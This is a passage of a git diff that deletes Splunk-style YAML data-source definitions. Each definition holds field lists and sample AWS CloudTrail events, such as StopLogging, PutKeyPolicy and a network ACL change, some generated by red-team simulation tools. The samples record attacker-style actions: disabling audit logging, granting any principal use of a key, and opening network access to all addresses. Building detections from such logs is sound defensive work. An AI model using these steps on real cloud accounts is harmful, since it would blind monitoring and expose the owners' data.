\"sha256:547fc07c53533763d68ebdfdc45529b1db45301d07824410bcc30df866d67df1\"\n   },\n   \"layers\": [\n      {\n         \"mediaType\": \"application/vnd.docker.image.rootfs.diff.tar.gzip\",\n         \"size\": 2811969,\n         \"digest\": \"sha256:540db60ca9383eac9e418f78490994d0af424aab7bf6d0e47ac8ed4e2e9bcbba\"\n      },\n      {\n         \"mediaType\": \"application/vnd.docker.image.rootfs.diff.tar.gzip\",\n         \"size\": 35426616,\n         \"digest\": \"sha256:f4fa1ac42c97abe89e0cc807af0ae4b63fbec2a5209a75a7239d099702c7fd80\"\n      },\n      {\n         \"mediaType\": \"application/vnd.docker.image.rootfs.diff.tar.gzip\",\n         \"size\": 2347076,\n         \"digest\": \"sha256:2b3e10d0c87c453eed1378e102ff1cc17aa4e3eed2159b7505959777a6225059\"\n      },\n      {\n         \"mediaType\": \"application/vnd.docker.image.rootfs.diff.tar.gzip\",\n         \"size\": 280,\n         \"digest\": \"sha256:43bd2fc3ba418e309449b8c82d723d9069ebb81863050dc0d6ad6e6ec0683808\"\n      },\n      {\n         \"mediaType\": \"application/vnd.docker.image.rootfs.diff.tar.gzip\",\n         \"size\": 92,\n         \"digest\": \"sha256:803d6b58954d4daee18ed071281627f8214f3d2ba1b9a419ab8834029310942a\"\n      },\n      {\n         \"mediaType\": \"application/vnd.docker.image.rootfs.diff.tar.gzip\",\n         \"size\": 373,\n         \"digest\": \"sha256:e664d5491b5c81e901a2293fbc025532a7cae0dcc75ce7418f854209aaa2474c\"\n      },\n      {\n         \"mediaType\": \"application/vnd.docker.image.rootfs.diff.tar.gzip\",\n         \"size\": 2383293,\n         \"digest\": \"sha256:b827c586a783ce490b79907607d535f99f42360b6ba86a4b2ac3e7f01542144d\"\n      },\n      {\n         \"mediaType\": \"application/vnd.docker.image.rootfs.diff.tar.gzip\",\n         \"size\": 10001,\n         \"digest\": \"sha256:0dd85ef396bcaded88fab4a8079d6b8bd5e3f8cf7eeb9b93306ffdb63401ba0a\"\n      }\n   ]\n}", "imageManifestMediaType": "application/vnd.docker.distribution.manifest.v2+json", "imageTag": "latest"}, "responseElements": {"image": {"registryId": "111111111112", "repositoryName": "devsecops/cat_dog_server", "imageId": {"imageDigest": "sha256:b7798f35949cc1a2d435c9ac59ab69e857fe635a359c96e4f56a8498ce02019c", "imageTag": "latest"}, "imageManifest": "{\n   \"schemaVersion\": 2,\n   \"mediaType\": \"application/vnd.docker.distribution.manifest.v2+json\",\n   \"config\": {\n      \"mediaType\": \"application/vnd.docker.container.image.v1+json\",\n      \"size\": 6591,\n      \"digest\": \"sha256:547fc07c53533763d68ebdfdc45529b1db45301d07824410bcc30df866d67df1\"\n   },\n   \"layers\": [\n      {\n         \"mediaType\": \"application/vnd.docker.image.rootfs.diff.tar.gzip\",\n         \"size\": 2811969,\n         \"digest\": \"sha256:540db60ca9383eac9e418f78490994d0af424aab7bf6d0e47ac8ed4e2e9bcbba\"\n      },\n      {\n         \"mediaType\": \"application/vnd.docker.image.rootfs.diff.tar.gzip\",\n         \"size\": 35426616,\n         \"digest\": \"sha256:f4fa1ac42c97abe89e0cc807af0ae4b63fbec2a5209a75a7239d099702c7fd80\"\n      },\n      {\n         \"mediaType\": \"application/vnd.docker.image.rootfs.diff.tar.gzip\",\n         \"size\": 2347076,\n         \"digest\": \"sha256:2b3e10d0c87c453eed1378e102ff1cc17aa4e3eed2159b7505959777a6225059\"\n      },\n      {\n         \"mediaType\": \"application/vnd.docker.image.rootfs.diff.tar.gzip\",\n         \"size\": 280,\n         \"digest\": \"sha256:43bd2fc3ba418e309449b8c82d723d9069ebb81863050dc0d6ad6e6ec0683808\"\n      },\n      {\n         \"mediaType\": \"application/vnd.docker.image.rootfs.diff.tar.gzip\",\n         \"size\": 92,\n         \"digest\": \"sha256:803d6b58954d4daee18ed071281627f8214f3d2ba1b9a419ab8834029310942a\"\n      },\n      {\n         \"mediaType\": \"application/vnd.docker.image.rootfs.diff.tar.gzip\",\n         \"size\": 373,\n         \"digest\": \"sha256:e664d5491b5c81e901a2293fbc025532a7cae0dcc75ce7418f854209aaa2474c\"\n      },\n      {\n         \"mediaType\": \"application/vnd.docker.image.rootfs.diff.tar.gzip\",\n         \"size\": 2383293,\n         \"digest\": \"sha256:b827c586a783ce490b79907607d535f99f42360b6ba86a4b2ac3e7f01542144d\"\n      },\n      {\n         \"mediaType\": \"application/vnd.docker.image.rootfs.diff.tar.gzip\",\n         \"size\": 10001,\n         \"digest\": \"sha256:0dd85ef396bcaded88fab4a8079d6b8bd5e3f8cf7eeb9b93306ffdb63401ba0a\"\n      }\n   ]\n}", "imageManifestMediaType": "application/vnd.docker.distribution.manifest.v2+json"}}, "requestID": "805a31e6-0fed-433b-b393-f463c6881334", "eventID": "1aef3588-ae84-4f1f-9276-8ec94ee6a7e9", "readOnly": false, "resources": [{"accountId": "111111111111", "ARN": "arn:aws:ecr:eu-central-1:1111111111111:repository/devsecops/cat_dog_server"}], "eventType": "AwsApiCall", "managementEvent": true, "recipientAccountId": "111111111111", "eventCategory": "Management"}'
diff --git a/data_sources/cloud/event_sources/AWS_CloudTrail_PutKeyPolicy.yml b/data_sources/cloud/event_sources/AWS_CloudTrail_PutKeyPolicy.yml
deleted file mode 100644
index b5eb989646..0000000000
--- a/data_sources/cloud/event_sources/AWS_CloudTrail_PutKeyPolicy.yml
+++ /dev/null
@@ -1,85 +0,0 @@
-event_name: AWS CloudTrail PutKeyPolicy
-fields:
-- _time
-- app
-- awsRegion
-- aws_account_id
-- command
-- date_hour
-- date_mday
-- date_minute
-- date_month
-- date_second
-- date_wday
-- date_year
-- date_zone
-- dest
-- dvc
-- errorCode
-- eventCategory
-- eventID
-- eventName
-- eventSource
-- eventTime
-- eventType
-- eventVersion
-- eventtype
-- host
-- index
-- linecount
-- managementEvent
-- msg
-- object_category
-- product
-- punct
-- readOnly
-- recipientAccountId
-- region
-- requestID
-- requestParameters.bypassPolicyLockoutSafetyCheck
-- requestParameters.keyId
-- requestParameters.policy
-- requestParameters.policyName
-- resources{}.ARN
-- resources{}.accountId
-- resources{}.type
-- responseElements
-- signature
-- source
-- sourceIPAddress
-- sourcetype
-- splunk_server
-- src
-- src_ip
-- start_time
-- tag
-- tag::eventtype
-- timeendpos
-- timestartpos
-- user
-- userAgent
-- userIdentity.accessKeyId
-- userIdentity.accountId
-- userIdentity.arn
-- userIdentity.principalId
-- userIdentity.sessionContext.attributes.creationDate
-- userIdentity.sessionContext.attributes.mfaAuthenticated
-- userIdentity.sessionContext.sessionIssuer.accountId
-- userIdentity.sessionContext.sessionIssuer.arn
-- userIdentity.sessionContext.sessionIssuer.principalId
-- userIdentity.sessionContext.sessionIssuer.type
-- userIdentity.sessionContext.sessionIssuer.userName
-- userIdentity.type
-- userName
-- user_access_key
-- user_agent
-- user_arn
-- user_group_id
-- user_id
-- user_name
-- user_type
-- vendor
-- vendor_account
-- vendor_product
-- vendor_region
-example_log: '{"eventVersion": "1.08", "userIdentity": {"type": "AssumedRole", "principalId": "AROAIJIESMXKGCJRCTPR6:pbareiss@splunk.local", "arn": "arn:aws:sts::111111111111:assumed-role/okta_adm_role/pbareiss@splunk.local", "accountId": "111111111111", "accessKeyId": "ASIAYTOGP2RLK74OPBDR", "sessionContext": {"sessionIssuer": {"type": "Role", "principalId": "AROAIJIESMXKGCJRCTPR6", "arn": "arn:aws:iam::111111111111:role/okta_adm_role", "accountId": "111111111111", "userName": "okta_adm_role"}, "webIdFederationData": {}, "attributes": {"mfaAuthenticated": "false", "creationDate": "2021-01-11T09:03:18Z"}}}, "eventTime": "2021-01-11T11:04:39Z", "eventSource": "kms.amazonaws.com", "eventName": "PutKeyPolicy", "awsRegion": "us-west-2", "sourceIPAddress": "95.90.199.65", "userAgent": "aws-internal/3 aws-sdk-java/1.11.893 Linux/4.9.230-0.1.ac.223.84.332.metal1.x86_64 OpenJDK_64-Bit_Server_VM/25.272-b10 java/1.8.0_272 vendor/Oracle_Corporation", "requestParameters": {"keyId": "f2a82583-a7d3-4c92-8787-fe2baab1cee1", "policyName": "default", "policy": "{\n    \"Version\": \"2012-10-17\",\n    \"Id\": \"key-consolepolicy-3\",\n    \"Statement\": [\n        {\n            \"Sid\": \"Enable IAM User Permissions\",\n            \"Effect\": \"Allow\",\n            \"Principal\": {\n                \"AWS\": \"arn:aws:iam::111111111111:root\"\n            },\n            \"Action\": \"kms:*\",\n            \"Resource\": \"*\"\n        },\n        {\n            \"Sid\": \"Allow access for Key Administrators\",\n            \"Effect\": \"Allow\",\n            \"Principal\": {\n                \"AWS\": \"arn:aws:iam::111111111111:user/patrick_cli\"\n            },\n            \"Action\": [\n                \"kms:Create*\",\n                \"kms:Describe*\",\n                \"kms:Enable*\",\n                \"kms:List*\",\n                \"kms:Put*\",\n                \"kms:Update*\",\n                \"kms:Revoke*\",\n                \"kms:Disable*\",\n                \"kms:Get*\",\n                \"kms:Delete*\",\n                \"kms:TagResource\",\n                \"kms:UntagResource\",\n                \"kms:ScheduleKeyDeletion\",\n                \"kms:CancelKeyDeletion\"\n            ],\n            \"Resource\": \"*\"\n        },\n        {\n            \"Sid\": \"Allow use of the key\",\n            \"Effect\": \"Allow\",\n            \"Principal\": {\n                \"AWS\": \"arn:aws:iam::111111111111:user/patrick_cli\"\n            },\n            \"Action\": [\n                \"kms:Encrypt\",\n                \"kms:Decrypt\",\n                \"kms:ReEncrypt*\",\n                \"kms:GenerateDataKey*\",\n                \"kms:DescribeKey\"\n            ],\n            \"Resource\": \"*\"\n        },\n        {\n            \"Sid\": \"Allow attachment of persistent resources\",\n            \"Effect\": \"Allow\",\n            \"Principal\": {\n                \"AWS\": \"arn:aws:iam::111111111111:user/patrick_cli\"\n            },\n            \"Action\": [\n                \"kms:CreateGrant\",\n                \"kms:ListGrants\",\n                \"kms:RevokeGrant\"\n            ],\n            \"Resource\": \"*\",\n            \"Condition\": {\n                \"Bool\": {\n                    \"kms:GrantIsForAWSResource\": \"true\"\n                }\n            }\n        },\n        {\n            \"Sid\": \"Allow use of the key\",\n            \"Effect\": \"Allow\",\n            \"Principal\": {\n                \"AWS\": \"*\"\n            },\n            \"Action\": [\n                \"kms:Encrypt\"\n            ],\n            \"Resource\": \"*\"\n        }\n    ]\n}", "bypassPolicyLockoutSafetyCheck": false}, "responseElements": null, "requestID": "c7836c7a-ca95-47aa-a3fb-a7db0d66fec8", "eventID": "612f17e3-2317-4dd9-8aa3-393bc8a7961b", "readOnly": false, "resources": [{"accountId": "111111111111", "type": "AWS::KMS::Key", "ARN": "arn:aws:kms:us-west-2:111111111111:key/f2a82583-a7d3-4c92-8787-fe2baab1cee1"}], "eventType": "AwsApiCall", "managementEvent": true, "eventCategory": "Management", "recipientAccountId": "111111111111"}'
diff --git a/data_sources/cloud/event_sources/AWS_CloudTrail_ReplaceNetworkAclEntry.yml b/data_sources/cloud/event_sources/AWS_CloudTrail_ReplaceNetworkAclEntry.yml
deleted file mode 100644
index f6aead0598..0000000000
--- a/data_sources/cloud/event_sources/AWS_CloudTrail_ReplaceNetworkAclEntry.yml
+++ /dev/null
@@ -1,92 +0,0 @@
-event_name: AWS CloudTrail ReplaceNetworkAclEntry
-fields:
-- _time
-- action
-- app
-- awsRegion
-- aws_account_id
-- change_type
-- command
-- date_hour
-- date_mday
-- date_minute
-- date_month
-- date_second
-- date_wday
-- date_year
-- date_zone
-- direction
-- dvc
-- errorCode
-- eventCategory
-- eventID
-- eventName
-- eventSource
-- eventTime
-- eventType
-- eventVersion
-- eventtype
-- host
-- index
-- linecount
-- managementEvent
-- msg
-- object_category
-- product
-- protocol
-- protocol_code
-- punct
-- readOnly
-- recipientAccountId
-- region
-- requestID
-- requestParameters.aclProtocol
-- requestParameters.cidrBlock
-- requestParameters.egress
-- requestParameters.networkAclId
-- requestParameters.ruleAction
-- requestParameters.ruleNumber
-- responseElements._return
-- responseElements.requestId
-- rule_action
-- signature
-- source
-- sourceIPAddress
-- sourcetype
-- splunk_server
-- src
-- src_ip
-- src_ip_range
-- start_time
-- status
-- tag
-- tag::eventtype
-- timeendpos
-- timestartpos
-- user
-- userAgent
-- userIdentity.accessKeyId
-- userIdentity.accountId
-- userIdentity.arn
-- userIdentity.principalId
-- userIdentity.sessionContext.attributes.creationDate
-- userIdentity.sessionContext.attributes.mfaAuthenticated
-- userIdentity.sessionContext.sessionIssuer.accountId
-- userIdentity.sessionContext.sessionIssuer.arn
-- userIdentity.sessionContext.sessionIssuer.principalId
-- userIdentity.sessionContext.sessionIssuer.type
-- userIdentity.sessionContext.sessionIssuer.userName
-- userIdentity.type
-- userName
-- user_access_key
-- user_agent
-- user_arn
-- user_group_id
-- user_id
-- user_name
-- user_type
-- vendor
-- vendor_account
-- vendor_product
-- vendor_region
-example_log: '{"eventVersion": "1.08", "userIdentity": {"type": "AssumedRole", "principalId": "AROAIJIESMXKGCJRCTPR6:pbareiss@splunk.local", "arn": "arn:aws:sts::111111111111:assumed-role/okta_adm_role/pbareiss@splunk.local", "accountId": "111111111111", "accessKeyId": "ASIAYTOGP2RLF3F7BXZK", "sessionContext": {"sessionIssuer": {"type": "Role", "principalId": "AROAIJIESMXKGCJRCTPR6", "arn": "arn:aws:iam::111111111111:role/okta_adm_role", "accountId": "111111111111", "userName": "okta_adm_role"}, "webIdFederationData": {}, "attributes": {"mfaAuthenticated": "false", "creationDate": "2021-01-12T08:36:15Z"}}}, "eventTime": "2021-01-12T08:49:49Z", "eventSource": "ec2.amazonaws.com", "eventName": "ReplaceNetworkAclEntry", "awsRegion": "eu-central-1", "sourceIPAddress": "95.90.199.65", "userAgent": "console.ec2.amazonaws.com", "requestParameters": {"networkAclId": "acl-078ccebebcbabe175", "ruleNumber": 20, "egress": false, "ruleAction": "allow", "icmpTypeCode": {}, "portRange": {}, "aclProtocol": "-1", "cidrBlock": "0.0.0.0/0"}, "responseElements": {"requestId": "97b40da9-9291-4a92-8e9e-892b6887ffc9", "_return": true}, "requestID": "97b40da9-9291-4a92-8e9e-892b6887ffc9", "eventID": "46fe04b8-d007-4933-8bb8-c8b65c1121fa", "readOnly": false, "eventType": "AwsApiCall", "managementEvent": true, "eventCategory": "Management", "recipientAccountId": "111111111111"}'
diff --git a/data_sources/cloud/event_sources/AWS_CloudTrail_SetDefaultPolicyVersion.yml b/data_sources/cloud/event_sources/AWS_CloudTrail_SetDefaultPolicyVersion.yml
deleted file mode 100644
index 221853a5b1..0000000000
--- a/data_sources/cloud/event_sources/AWS_CloudTrail_SetDefaultPolicyVersion.yml
+++ /dev/null
@@ -1,77 +0,0 @@
-event_name: AWS CloudTrail SetDefaultPolicyVersion
-fields:
-- _time
-- action
-- app
-- awsRegion
-- aws_account_id
-- change_type
-- command
-- date_hour
-- date_mday
-- date_minute
-- date_month
-- date_second
-- date_wday
-- date_year
-- date_zone
-- dest
-- dvc
-- errorCode
-- eventCategory
-- eventID
-- eventName
-- eventSource
-- eventTime
-- eventType
-- eventVersion
-- eventtype
-- host
-- index
-- linecount
-- managementEvent
-- msg
-- object_category
-- product
-- punct
-- readOnly
-- recipientAccountId
-- region
-- requestID
-- requestParameters.policyArn
-- requestParameters.versionId
-- responseElements
-- signature
-- source
-- sourceIPAddress
-- sourcetype
-- splunk_server
-- src
-- src_ip
-- start_time
-- status
-- tag
-- tag::eventtype
-- timeendpos
-- timestartpos
-- user
-- userAgent
-- userIdentity.accessKeyId
-- userIdentity.accountId
-- userIdentity.arn
-- userIdentity.principalId
-- userIdentity.type
-- userIdentity.userName
-- userName
-- user_access_key
-- user_agent
-- user_arn
-- user_group_id
-- user_id
-- user_name
-- user_type
-- vendor
-- vendor_account
-- vendor_product
-- vendor_region
-example_log: '{"eventVersion": "1.08", "userIdentity": {"type": "IAMUser", "principalId": "AIDAYTOGP2RLESDK2NOSX", "arn": "arn:aws:iam::111111111111:user/AtomicRedTeam", "accountId": "111111111111", "accessKeyId": "AKIAYTOGP2RLKMZDMPVA", "userName": "AtomicRedTeam"}, "eventTime": "2021-03-02T21:05:49Z", "eventSource": "iam.amazonaws.com", "eventName": "SetDefaultPolicyVersion", "awsRegion": "us-east-1", "sourceIPAddress": "73.15.72.101", "userAgent": "aws-cli/2.0.62 Python/3.9.0 Darwin/19.6.0 source/x86_64 command/iam.set-default-policy-version", "requestParameters": {"policyArn": "arn:aws:iam::111111111111:policy/VulnerablePolicy", "versionId": "v1"}, "responseElements": null, "requestID": "3bdf8738-2eab-4ae8-a858-2e2a4ccfc66b", "eventID": "742f6e55-4bc7-49e2-965f-56ffbc46a980", "readOnly": false, "eventType": "AwsApiCall", "managementEvent": true, "eventCategory": "Management", "recipientAccountId": "111111111111"}'
diff --git a/data_sources/cloud/event_sources/AWS_CloudTrail_StopLogging.yml b/data_sources/cloud/event_sources/AWS_CloudTrail_StopLogging.yml
deleted file mode 100644
index 99c24c1aa3..0000000000
--- a/data_sources/cloud/event_sources/AWS_CloudTrail_StopLogging.yml
+++ /dev/null
@@ -1,73 +0,0 @@
-event_name: AWS CloudTrail StopLogging
-fields:
-- _time
-- app
-- awsRegion
-- aws_account_id
-- command
-- date_hour
-- date_mday
-- date_minute
-- date_month
-- date_second
-- date_wday
-- date_year
-- date_zone
-- dest
-- dvc
-- errorCode
-- eventCategory
-- eventID
-- eventName
-- eventSource
-- eventTime
-- eventType
-- eventVersion
-- host
-- index
-- linecount
-- managementEvent
-- msg
-- object_category
-- product
-- punct
-- readOnly
-- recipientAccountId
-- region
-- requestID
-- requestParameters.name
-- responseElements
-- signature
-- source
-- sourceIPAddress
-- sourcetype
-- splunk_server
-- src
-- src_ip
-- start_time
-- timeendpos
-- timestartpos
-- tlsDetails.cipherSuite
-- tlsDetails.clientProvidedHostHeader
-- tlsDetails.tlsVersion
-- user
-- userAgent
-- userIdentity.accessKeyId
-- userIdentity.accountId
-- userIdentity.arn
-- userIdentity.principalId
-- userIdentity.type
-- userIdentity.userName
-- userName
-- user_access_key
-- user_agent
-- user_arn
-- user_group_id
-- user_id
-- user_name
-- user_type
-- vendor
-- vendor_account
-- vendor_product
-- vendor_region
-example_log: '{"eventVersion": "1.08", "userIdentity": {"type": "IAMUser", "principalId": "AIDAYTOGP2RLEHRX5YWNV", "arn": "arn:aws:iam::111111111111:user/bhavin_cli", "accountId": "111111111111", "accessKeyId": "AKIAYTOGP2RLKQ3U2PDY", "userName": "bhavin_cli"}, "eventTime": "2022-06-30T21:26:49Z", "eventSource": "cloudtrail.amazonaws.com", "eventName": "StopLogging", "awsRegion": "us-west-2", "sourceIPAddress": "72.193.184.209", "userAgent": "stratus-red-team_a6a8f8f2-d560-4062-bd0d-c232130cfcc5", "requestParameters": {"name": "my-cloudtrail-trail"}, "responseElements": null, "requestID": "d8b79caa-08d2-4f7e-b93a-73bb7b85f260", "eventID": "9f8d2b82-6e9d-45b8-9055-78d8c00ca416", "readOnly": false, "eventType": "AwsApiCall", "managementEvent": true, "recipientAccountId": "111111111111", "eventCategory": "Management", "tlsDetails": {"tlsVersion": "TLSv1.2", "cipherSuite": "ECDHE-RSA-AES128-GCM-SHA256", "clientProvidedHostHeader": "cloudtrail.us-west-2.amazonaws.com"}}'
diff --git a/data_sources/cloud/event_sources/AWS_CloudTrail_UpdateAccountPasswordPolicy.yml b/data_sources/cloud/event_sources/AWS_CloudTrail_UpdateAccountPasswordPolicy.yml
deleted file mode 100644
index e4e2e47538..0000000000
--- a/data_sources/cloud/event_sources/AWS_CloudTrail_UpdateAccountPasswordPolicy.yml
+++ /dev/null
@@ -1,84 +0,0 @@
-event_name: AWS CloudTrail UpdateAccountPasswordPolicy
-fields:
-- _time
-- action
-- app
-- awsRegion
-- aws_account_id
-- change_type
-- command
-- date_hour
-- date_mday
-- date_minute
-- date_month
-- date_second
-- date_wday
-- date_year
-- date_zone
-- dest
-- dvc
-- errorCode
-- eventCategory
-- eventID
-- eventName
-- eventSource
-- eventTime
-- eventType
-- eventVersion
-- eventtype
-- host
-- index
-- linecount
-- managementEvent
-- msg
-- object_category
-- product
-- punct
-- readOnly
-- recipientAccountId
-- region
-- requestID
-- requestParameters.allowUsersToChangePassword
-- requestParameters.hardExpiry
-- requestParameters.minimumPasswordLength
-- requestParameters.requireLowercaseCharacters
-- requestParameters.requireNumbers
-- requestParameters.requireSymbols
-- requestParameters.requireUppercaseCharacters
-- responseElements
-- sessionCredentialFromConsole
-- signature
-- source
-- sourceIPAddress
-- sourcetype
-- splunk_server
-- src
-- src_ip
-- start_time
-- status
-- tag
-- tag::eventtype
-- timeendpos
-- timestartpos
-- user
-- userAgent
-- userIdentity.accessKeyId
-- userIdentity.accountId
-- userIdentity.arn
-- userIdentity.principalId
-- userIdentity.sessionContext.attributes.creationDate
-- userIdentity.sessionContext.attributes.mfaAuthenticated
-- userIdentity.type
-- userName
-- user_access_key
-- user_agent
-- user_arn
-- user_group_id
-- user_id
-- user_name
-- user_type
-- vendor
-- vendor_account
-- vendor_product
-- vendor_region
-example_log: '{"eventVersion": "1.08", "userIdentity": {"type": "Root", "principalId": "111111111111", "arn": "arn:aws:iam::111111111111:root", "accountId": "111111111111", "accessKeyId": "ASIASBMSCQHHZZ4THONS", "sessionContext": {"sessionIssuer": {}, "webIdFederationData": {}, "attributes": {"creationDate": "2023-01-26T22:10:41Z", "mfaAuthenticated": "false"}}}, "eventTime": "2023-01-26T22:38:59Z", "eventSource": "iam.amazonaws.com", "eventName": "UpdateAccountPasswordPolicy", "awsRegion": "us-east-1", "sourceIPAddress": "23.93.193.7", "userAgent": "AWS Internal", "requestParameters": {"minimumPasswordLength": 6, "requireSymbols": true, "requireNumbers": false, "requireUppercaseCharacters": false, "requireLowercaseCharacters": false, "allowUsersToChangePassword": false, "hardExpiry": false}, "responseElements": null, "requestID": "7685efa9-5c56-451a-bd25-3db520108589", "eventID": "ccc1d5c2-dd72-4798-8023-ed5a4205f2d5", "readOnly": false, "eventType": "AwsApiCall", "managementEvent": true, "recipientAccountId": "111111111111", "eventCategory": "Management", "sessionCredentialFromConsole": "true"}'
diff --git a/data_sources/cloud/event_sources/AWS_CloudTrail_UpdateLoginProfile.yml b/data_sources/cloud/event_sources/AWS_CloudTrail_UpdateLoginProfile.yml
deleted file mode 100644
index ea7affff5a..0000000000
--- a/data_sources/cloud/event_sources/AWS_CloudTrail_UpdateLoginProfile.yml
+++ /dev/null
@@ -1,76 +0,0 @@
-event_name: AWS CloudTrail UpdateLoginProfile
-fields:
-- _time
-- action
-- app
-- awsRegion
-- aws_account_id
-- change_type
-- command
-- date_hour
-- date_mday
-- date_minute
-- date_month
-- date_second
-- date_wday
-- date_year
-- date_zone
-- dest
-- dvc
-- errorCode
-- eventCategory
-- eventID
-- eventName
-- eventSource
-- eventTime
-- eventType
-- eventVersion
-- eventtype
-- host
-- index
-- linecount
-- managementEvent
-- msg
-- object_category
-- product
-- punct
-- readOnly
-- recipientAccountId
-- region
-- requestID
-- requestParameters.userName
-- responseElements
-- signature
-- source
-- sourceIPAddress
-- sourcetype
-- splunk_server
-- src
-- src_ip
-- start_time
-- status
-- tag
-- tag::eventtype
-- timeendpos
-- timestartpos
-- user
-- userAgent
-- userIdentity.accessKeyId
-- userIdentity.accountId
-- userIdentity.arn
-- userIdentity.principalId
-- userIdentity.type
-- userIdentity.userName
-- userName
-- user_access_key
-- user_agent
-- user_arn
-- user_group_id
-- user_id
-- user_name
-- user_type
-- vendor
-- vendor_account
-- vendor_product
-- vendor_region
-example_log: '{"eventVersion": "1.08", "userIdentity": {"type": "IAMUser", "principalId": "AIDAYTOGP2RLEHRX5YWNV", "arn": "arn:aws:iam::111111111111:user/bhavin_cli", "accountId": "111111111111", "accessKeyId": "AKIAYTOGP2RLLAA6NJUM", "userName": "bhavin_cli"}, "eventTime": "2021-03-05T01:02:59Z", "eventSource": "iam.amazonaws.com", "eventName": "UpdateLoginProfile", "awsRegion": "us-east-1", "sourceIPAddress": "73.15.72.101", "userAgent": "aws-cli/2.0.62 Python/3.9.2 Darwin/19.6.0 source/x86_64 command/iam.update-login-profile", "requestParameters": {"userName": "AtomicRedTeam"}, "responseElements": null, "requestID": "08f38478-1749-4fb5-b07c-469d3448777a", "eventID": "033580e7-bbba-4b70-be63-7eeddb04b842", "readOnly": false, "eventType": "AwsApiCall", "managementEvent": true, "eventCategory": "Management", "recipientAccountId": "111111111111"}'
diff --git a/data_sources/cloud/event_sources/AWS_CloudTrail_UpdateSAMLProvider.yml b/data_sources/cloud/event_sources/AWS_CloudTrail_UpdateSAMLProvider.yml
deleted file mode 100644
index 88da9746e2..0000000000
--- a/data_sources/cloud/event_sources/AWS_CloudTrail_UpdateSAMLProvider.yml
+++ /dev/null
@@ -1,84 +0,0 @@
-event_name: AWS CloudTrail UpdateSAMLProvider
-fields:
-- _time
-- action
-- app
-- awsRegion
-- aws_account_id
-- change_type
-- command
-- date_hour
-- date_mday
-- date_minute
-- date_month
-- date_second
-- date_wday
-- date_year
-- date_zone
-- dest
-- dvc
-- errorCode
-- eventCategory
-- eventID
-- eventName
-- eventSource
-- eventTime
-- eventType
-- eventVersion
-- eventtype
-- host
-- index
-- linecount
-- managementEvent
-- msg
-- object_category
-- product
-- punct
-- readOnly
-- recipientAccountId
-- region
-- requestID
-- requestParameters.sAMLMetadataDocument
-- requestParameters.sAMLProviderArn
-- responseElements.sAMLProviderArn
-- signature
-- source
-- sourceIPAddress
-- sourcetype
-- splunk_server
-- src
-- src_ip
-- start_time
-- status
-- tag
-- tag::eventtype
-- timeendpos
-- timestartpos
-- user
-- userAgent
-- userIdentity.accessKeyId
-- userIdentity.accountId
-- userIdentity.arn
-- userIdentity.principalId
-- userIdentity.sessionContext.attributes.creationDate
-- userIdentity.sessionContext.attributes.mfaAuthenticated
-- userIdentity.sessionContext.sessionIssuer.accountId
-- userIdentity.sessionContext.sessionIssuer.arn
-- userIdentity.sessionContext.sessionIssuer.principalId
-- userIdentity.sessionContext.sessionIssuer.type
-- userIdentity.sessionContext.sessionIssuer.userName
-- userIdentity.type
-- userName
-- user_access_key
-- user_agent
-- user_arn
-- user_group_id
-- user_id
-- user_name
-- user_type
-- vendor
-- vendor_account
-- vendor_product
-- vendor_region
-example_log: '{"eventVersion": "1.08", "userIdentity": {"type": "AssumedRole", "principalId": "AROAYTOGP2RLKFUVAQAIJ:rodsoto@rodsoto.onmicrosoft.com", "arn": "arn:aws:sts::111111111111:assumed-role/rodonmicrotestrole/rodsoto@rodsoto.onmicrosoft.com", "accountId": "111111111111", "accessKeyId": "ASIAYTOGP2RLMZGPIW6C", "sessionContext": {"sessionIssuer": {"type": "Role", "principalId": "AROAYTOGP2RLKFUVAQAIJ", "arn": "arn:aws:iam::111111111111:role/rodonmicrotestrole", "accountId": "111111111111", "userName": "rodonmicrotestrole"}, "webIdFederationData": {}, "attributes": {"mfaAuthenticated": "false", "creationDate": "2021-01-20T03:10:32Z"}}}, "eventTime": "2021-01-20T03:12:39Z", "eventSource": "iam.amazonaws.com", "eventName": "UpdateSAMLProvider", "awsRegion": "us-east-1", "sourceIPAddress": "66.176.252.11", "userAgent": "aws-internal/3 aws-sdk-java/1.11.930 Linux/4.9.230-0.1.ac.223.84.332.metal1.x86_64 OpenJDK_64-Bit_Server_VM/25.275-b01 java/1.8.0_275 vendor/Oracle_Corporation", "requestParameters": {"sAMLMetadataDocument": "<?xml version=\"1.0\" encoding=\"utf-8\"?><EntityDescriptor ID=\"_6898aaf1-1639-44d4-956b-5bf936af37f1\" entityID=\"https://sts.windows.net/0e8108b1-18e9-41a4-961b-dfcddf92ef08/\" xmlns=\"urn:oasis:names:tc:SAML:2.0:metadata\"><Signature xmlns=\"http://www.w3.org/2000/09/xmldsig#\"><SignedInfo><CanonicalizationMethod Algorithm=\"http://www.w3.org/2001/10/xml-exc-c14n#\" /><SignatureMethod Algorithm=\"http://www.w3.org/2001/04/xmldsig-more#rsa-sha256\" /><Reference URI=\"#_6898aaf1-1639-44d4-956b-5bf936af37f1\"><Transforms><Transform Algorithm=\"http://www.w3.org/2000/09/xmldsig#enveloped-signature\" /><Transform Algorithm=\"http://www.w3.org/2001/10/xml-exc-c14n#\" /></Transforms><DigestMethod Algorithm=\"http://www.w3.org/2001/04/xmlenc#sha256\" 